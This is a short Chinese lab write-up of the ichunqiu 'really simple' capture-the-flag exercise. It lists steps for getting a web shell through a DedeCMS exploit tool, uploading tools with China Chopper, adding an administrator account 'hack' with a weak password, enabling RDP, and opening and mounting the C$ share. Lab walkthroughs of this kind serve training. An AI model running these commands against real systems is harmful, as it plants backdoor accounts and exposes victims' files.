ichunqiu《真的很简单》实验的几个坑点

用了一下午 做了下这个实验

各种百度无果 作为一枚资深菜鸟 觉得没有一个完整的教程是活不下去的好嘛 .. 被整的死去活来QAQ.

---

本次实验要求获取www.test.ichunqiu网站的FLAG信息

---

第一个《我很简单》：参考 独狼的攻略

1.getshell
通过dedecms漏洞利用工具下载 ，链接 tools.ichunqiu.com
之后去掉前3后1 去解md5

• 2.菜刀上传 pr,cmd,net,net1

• 3.net user hack 123 /add
  net localgroup administrators hack /add
  3389

• 4.net user hack //验证是否成功加上

• 5.in target host>>
  net share ipc$ //打开ipc共享
  net share c$=c: //打开c盘共享

• 6.in loacl host>>
  net use h: \172.16.12.2\c$ "123" /user:"hack"

  net use 查看连接情况
  net share 查看建立的IPC的连接

ps：时间太紧 明天开课了 作业还没写 先这样 ..